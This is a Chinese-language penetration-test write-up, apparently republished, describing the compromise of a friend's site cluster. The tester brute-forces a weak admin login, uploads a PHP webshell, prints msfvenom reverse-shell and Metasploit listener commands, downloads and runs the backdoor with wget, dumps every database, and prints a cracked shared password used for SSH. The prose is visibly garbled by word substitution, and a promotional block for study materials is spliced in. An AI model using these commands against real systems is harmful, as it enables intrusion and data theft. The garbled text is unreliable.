https://www.hetianlab.com/expc.do?ec=ECIDfaf3-05da-4d49-9e11-72953b14f22c&pk_campaign=weixin-wemedia

通过DoraBox靶场系列闯关练习,理解文件上传漏洞的根本知识及如何进行绕过上传恶意文件。

前两天我一个朋友给我发来一个链接,说他做的站准备上线,问我能不能做下测试,既然是朋友,那肯定义不容辞,准备开始搞事情。

php小马下载地址从弱口令到拿下站群办事器 RESTful API

先打开网站浏览一下,创造直接跳转到了登录页面,如下:

大略了考试测验了下弱口令、万能密码和登录框xss,创造输入框对输入内容做了严格的过滤,造孽字符一概不许可,果断放弃。

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回答“领取”获取——】

1.网络安全多个方向学习路线

2.全网最全的CTF入门学习资料

3.一线大佬实战履历分享条记

4.网安大厂口试题合集

5.红蓝对抗实战技能秘籍

6.网络安全根本入门、Linux、web安全、渗透测试方面视频

大略扫描了一下敏感目录,创造一个/adminx,果真这种开放注册的站都会给管理员供应一个专门的登录入口。

(忽略这个 1.zip,那是我打包整站时留下的

考试测验爆破,弱口令一波带走,进入后台,赶紧把喜讯报告给朋友,让他“惊喜”一下

探求上传点

进到后台之后探求上传点,创造系统设置处有修正站点logo的功能,先传个php小马试试水

我当场就惊了,你后台登录框过滤那么严格结果你这上传点就这就这??好歹做个本地校验啊,你让burpsuite面子往哪搁?

连接shell考试测验提权

传了马之后利用蚁剑连接,首先便是查看做事器信息,这里有个小插曲,打开虚拟终端之后无论实行什么命令,返回结果都是 ret=127

该当是做事器上有什么安全软件做了过滤,利用蚁剑自带的插件进行bypass

成功绕过

不过蚁剑的这个绕过连接不太稳定,而且速率也很慢,于是琢磨着建立一个meterpreter会话考试测验提权。

建立meterpreter 会话

在云做事器上利用msfvenom天生一个后门:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=做事器ip LPORT=监听端口 -f elf > shell.elf

然后在做事器设置一个监听会话:

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 做事器ip

set LPORT 监听端口

run

在做事器上利用python建立一个大略的http做事:

python3 -m http.server

在目标主机利用wget下载后门文件并实行,成功获取meterpreter会话

考试测验提权受阻

由于目标做事器运行的是 CentOS 8.0,内核版本为 Linux 4.18.0,且我获取到的仅为一个低权限的shell,想要实现提权是很难的,在明知肯定失落败的情形下我还是考试测验了脏牛等所有的我手上能用的提权exp,均发布失落败,也是猜想之中的事。

柳暗花明又一村落

提权无果之后,我开始翻动做事器上的各种文件,然后创造了不得了的线索,乖乖这是个站群啊

然后我从每个站的配置文件中都得到了他们对应的数据库以及数据库账号密码,看样子该当是随机天生的,不像是会用作root用户密码的通用密码,如下图:

于是我上传了一个脱裤马,获取到了所有的数据库sql文件,考试测验访问所有的数据,以寻求一个可能的通用密码,没想到还真让我找到了,在几个采集站和发卡站的库中,我找到了如下相同的md5值:

md5解密后结果为:vip886.A

考试测验ssh连接做事器,成功

至此渗透结束。

总结

弱口令以及通用密码对付安全的危害还是很大的,其余上传功能的处理也是很主要的,一丁点防护都没有的上传点我是真头一回见。

漏洞报告已经交给我朋友啦,没想到还有小钱钱拿,愉快。